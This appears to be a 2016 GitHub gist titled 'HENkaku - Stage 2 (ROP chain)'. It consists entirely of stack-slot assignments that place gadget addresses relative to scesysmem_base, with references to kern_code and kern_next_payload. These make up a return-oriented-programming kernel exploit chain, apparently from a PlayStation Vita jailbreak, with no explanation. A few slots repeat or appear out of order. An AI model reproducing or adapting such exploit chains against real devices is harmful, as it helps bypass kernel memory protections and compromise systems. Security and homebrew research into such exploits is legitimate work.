@hexkyz
Created October 19, 2016 19:12
HENkaku - Stage 2 (ROP chain)
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031
0x00(x_stack + 0x00008A90) = 0x08106803
0x00(x_stack + 0x00008A94) = scesysmem_base + 0x0001EFF1
0x00(x_stack + 0x00008A98) = 0x00000038
0x00(x_stack + 0x00008A9C) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008AA0) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AA4) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008AA8) = scesysmem_base + 0x0001B571
0x00(x_stack + 0x00008AAC) = 0x00000000
0x00(x_stack + 0x00008AB0) = scesysmem_base + 0x00001E43
0x00(x_stack + 0x00008AB4) = 0x00000000
0x00(x_stack + 0x00008AB8) = scesysmem_base + 0x0001FC6D
0x00(x_stack + 0x00008ABC) = scesysmem_base + 0x0000EA73
0x00(x_stack + 0x00008AC0) = scesysmem_base + 0x00000031
0x00(x_stack + 0x00008AC4) = scesysmem_base + 0x00027913
0x00(x_stack + 0x00008AC8) = scesysmem_base + 0x0000A523
0x00(x_stack + 0x00008ACC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AD0) = scesysmem_base + 0x00000CE3
0x00(x_stack + 0x00008AD4) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AD8) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008ADC) = scesysmem_base + 0x00000067
0x00(x_stack + 0x00008AE0) = scesysmem_base + 0x0000587F
0x00(x_stack + 0x00008AE4) = scesysmem_base + 0x00019713
0x00(x_stack + 0x00008AE8) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008AEC) = scesysmem_base + 0x00001E1D
0x00(x_stack + 0x00008AF0) = 0x00000000
0x00(x_stack + 0x00008AF4) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008AF8) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AFC) = scesysmem_base + 0x00001603
0x00(x_stack + 0x00008B00) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008B04) = scesysmem_base + 0x00001F17
0x00(x_stack + 0x00008B08) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B0C) = scesysmem_base + 0x00000031
0x00(x_stack + 0x00008B10) = scesysmem_base + 0x0000B913
0x00(x_stack + 0x00008B14) = scesysmem_base + 0x00023B61
0x00(x_stack + 0x00008B18) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B1C) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008B20) = scesysmem_base + 0x000232EB
0x00(x_stack + 0x00008B24) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B28) = scesysmem_base + 0x0001B571
0x00(x_stack + 0x00008B2C) = scesysmem_base + 0x00023B61
0x00(x_stack + 0x00008B30) = scesysmem_base + 0x000232F1
0x00(x_stack + 0x00008B34) = scesysmem_base + 0x00001411
0x00(x_stack + 0x00008B38) = scesysmem_base + 0x00000AE1
0x00(x_stack + 0x00008B3C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B40) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008B44) = scesysmem_base + 0x00001411
0x00(x_stack + 0x00008B48) = 0x00000090
0x00(x_stack + 0x00008B4C) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008B50) = scesysmem_base + 0x00012B11
0x00(x_stack + 0x00008B54) = scesysmem_base + 0x00000CE3
0x00(x_stack + 0x00008B58) = scesysmem_base + 0x000000D1
0x00(x_stack + 0x00008B5C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B60) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008B64) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B68) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008B6C) = scesysmem_base + 0x0001FDC5
0x00(x_stack + 0x00008B70) = scesysmem_base + 0x0001D8DB
0x00(x_stack + 0x00008B74) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008B78) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008B7C) = scesysmem_base + 0x00011C5F
0x00(x_stack + 0x00008B80) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008B84) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B88) = scesysmem_base + 0x0000B913
0x00(x_stack + 0x00008B8C) = 0x00000000
0x00(x_stack + 0x00008B90) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008B94) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B98) = scesysmem_base + 0x00001861
0x00(x_stack + 0x00008B9C) = scesysmem_base + 0x0001FC6D
0x00(x_stack + 0x00008BA0) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008BA4) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BA8) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008BAC) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008BB0) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BB4) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008BB8) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BBC) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008BC0) = scesysmem_base + 0x0001614D
0x00(x_stack + 0x00008BC4) = scesysmem_base + 0x000233D3
0x00(x_stack + 0x00008BC8) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008BCC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BD0) = scesysmem_base + 0x000000AF
0x00(x_stack + 0x00008BD4) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008BD8) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008BDC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BE0) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008BE4) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008BE8) = scesysmem_base + 0x00001347
0x00(x_stack + 0x00008BEC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BF0) = scesysmem_base + 0x000000B9
0x00(x_stack + 0x00008BF4) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008BF8) = scesysmem_base + 0x00001347
0x00(x_stack + 0x00008BFC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C00) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008C04) = kern_code
0x00(x_stack + 0x00008C08) = scesysmem_base + 0x0001CB95
0x00(x_stack + 0x00008C0C) = scesysmem_base + 0x0001EA93
0x00(x_stack + 0x00008C10) = scesysmem_base + 0x00001411
0x00(x_stack + 0x00008C14) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C18) = scesysmem_base + 0x000209D7
0x00(x_stack + 0x00008C1C) = scesysmem_base + 0x000209D3
0x00(x_stack + 0x00008C20) = scesysmem_base + 0x00001411
0x00(x_stack + 0x00008C24) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C28) = scesysmem_base + 0x0001BAF5
0x00(x_stack + 0x00008C2C) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008C30) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C34) = scesysmem_base + 0x0000652B
0x00(x_stack + 0x00008C38) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C3C) = scesysmem_base + 0x0001BAF5
0x00(x_stack + 0x00008C40) = scesysmem_base + 0x00022A49
0x00(x_stack + 0x00008C44) = 0xFFFFFEB0
0x00(x_stack + 0x00008C48) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008C5C) = 0x00000040
0x00(x_stack + 0x00008C50) = scesysmem_base + 0x00022A49
0x00(x_stack + 0x00008C54) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C58) = scesysmem_base + 0x0000652B
0x00(x_stack + 0x00008C6C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C60) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008C64) = 0x00000040
0x00(x_stack + 0x00008C68) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008C6C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C70) = scesysmem_base + 0x0001D9EB
0x00(x_stack + 0x00008C74) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008C78) = scesysmem_base + 0x00000853
0x00(x_stack + 0x00008C7C) = scesysmem_base + 0x0001D8DB
0x00(x_stack + 0x00008C80) = 0x00000038
0x00(x_stack + 0x00008C84) = scesysmem_base + 0x000000AB
0x00(x_stack + 0x00008C88) = scesysmem_base + 0x000000D1
0x00(x_stack + 0x00008C8C) = scesysmem_base + 0x0002328B
0x00(x_stack + 0x00008C90) = scesysmem_base + 0x00022FCD
0x00(x_stack + 0x00008C94) = scesysmem_base + 0x000000D1
0x00(x_stack + 0x00008C98) = scesysmem_base + 0x0001EFF1
0x00(x_stack + 0x00008C9C) = scesysmem_base + 0x0002A117
0x00(x_stack + 0x00008CA0) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CA4) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008CA8) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008CAC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CB0) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008CB4) = scesysmem_base + 0x0001BF1F
0x00(x_stack + 0x00008CB8) = 0xFFFFFEB0
0x00(x_stack + 0x00008CBC) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008CC0) = 0x00000240
0x00(x_stack + 0x00008CC4) = scesysmem_base + 0x00022A49
0x00(x_stack + 0x00008CC8) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008CCC) = scesysmem_base + 0x00003D73
0x00(x_stack + 0x00008CD0) = 0x00000000
0x00(x_stack + 0x00008CD4) = scesysmem_base + 0x000021FD
0x00(x_stack + 0x00008CD8) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CDC) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008CE0) = scesysmem_base + 0x00000AE1
0x00(x_stack + 0x00008CE4) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CE8) = scesysmem_base + 0x0002A117
0x00(x_stack + 0x00008CEC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CF0) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008CF4) = scesysmem_base + 0x00000067
0x00(x_stack + 0x00008CF8) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008CFC) = scesysmem_base + 0x0001BF47
0x00(x_stack + 0x00008D00) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D04) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008D08) = scesysmem_base + 0x0000AF33
0x00(x_stack + 0x00008D0C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D10) = scesysmem_base + 0x0001D9EB
0x00(x_stack + 0x00008D14) = kern_next_payload
0x00(x_stack + 0x00008D18) = scesysmem_base + 0x0001FC6D
0x00(x_stack + 0x00008D1C) = scesysmem_base + 0x0000EA73
0x00(x_stack + 0x00008D20) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008D24) = scesysmem_base + 0x00000853
0x00(x_stack + 0x00008D28) = 0xFFFFFFFF
0x00(x_stack + 0x00008D2C) = 0x08106803
0x00(x_stack + 0x00008D30) = scesysmem_base + 0x000233D3
0x00(x_stack + 0x00008D34) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D38) = scesysmem_base + 0x00000433
0x00(x_stack + 0x00008D3C) = scesysmem_base + 0x000233D3
0x00(x_stack + 0x00008D40) = scesysmem_base + 0x000150A3
0x00(x_stack + 0x00008D44) = 0x00000000
0x00(x_stack + 0x00008D48) = scesysmem_base + 0x0000A74D
0x00(x_stack + 0x00008D4C) = scesysmem_base + 0x00000000
0x00(x_stack + 0x00008D50) = scesysmem_base + 0x00000853
0x00(x_stack + 0x00008D54) = scesysmem_base + 0x0001BF1F
0x00(x_stack + 0x00008D58) = 0x00000200
0x00(x_stack + 0x00008D5C) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008D60) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D64) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008D68) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008D6C) = scesysmem_base + 0x00022FCD
0x00(x_stack + 0x00008D70) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008D74) = scesysmem_base + 0x00000853
0x00(x_stack + 0x00008D78) = scesysmem_base + 0x00011C5F